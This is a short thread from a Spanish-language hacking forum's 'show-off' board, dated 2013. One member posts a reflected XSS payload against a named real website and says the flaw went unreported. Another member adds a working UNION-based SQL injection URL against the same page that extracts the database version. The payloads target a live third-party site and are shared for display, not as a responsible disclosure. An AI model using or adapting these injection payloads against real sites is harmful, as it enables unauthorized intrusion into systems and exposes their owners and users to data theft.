Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: F0M3T en Abril 12, 2013, 08:20:27 PM

Título: [Reflected XSS] elcossio.com
Publicado por: F0M3T en Abril 12, 2013, 08:20:27 PM
Url: http://www.elcossio.com
Url afectada: http://www.elcossio.com/articulos.php?id=66
Vector: "><script>alert(/F0M3T - UNDERC[0]DE/);</script>
Imagen:
(http://i.imgur.com/IBBq6gr.png)

Reportado: No.
Título: Re:[Reflected XSS] elcossio.com
Publicado por: q3rv0 en Abril 12, 2013, 09:02:41 PM
y la sqli?? http://www.elcossio.com/articulos.php?id=66%20and%280%29%20union%20select%201,version%28%29,3,4,5--
Título: Re:[Reflected XSS] elcossio.com
Publicado por: F0M3T en Abril 12, 2013, 09:18:26 PM
Cita de: [Q3rV[0] link=topic=15845.msg54902#msg54902 date=1365811361]
y la sqli?? http://www.elcossio.com/articulos.php?id=66%20and%280%29%20union%20select%201,version%28%29,3,4,5--
Es que apenas estoy comenzando, sólo sé hacer SQLi básica, gracias por la corrección... :D
Saludos.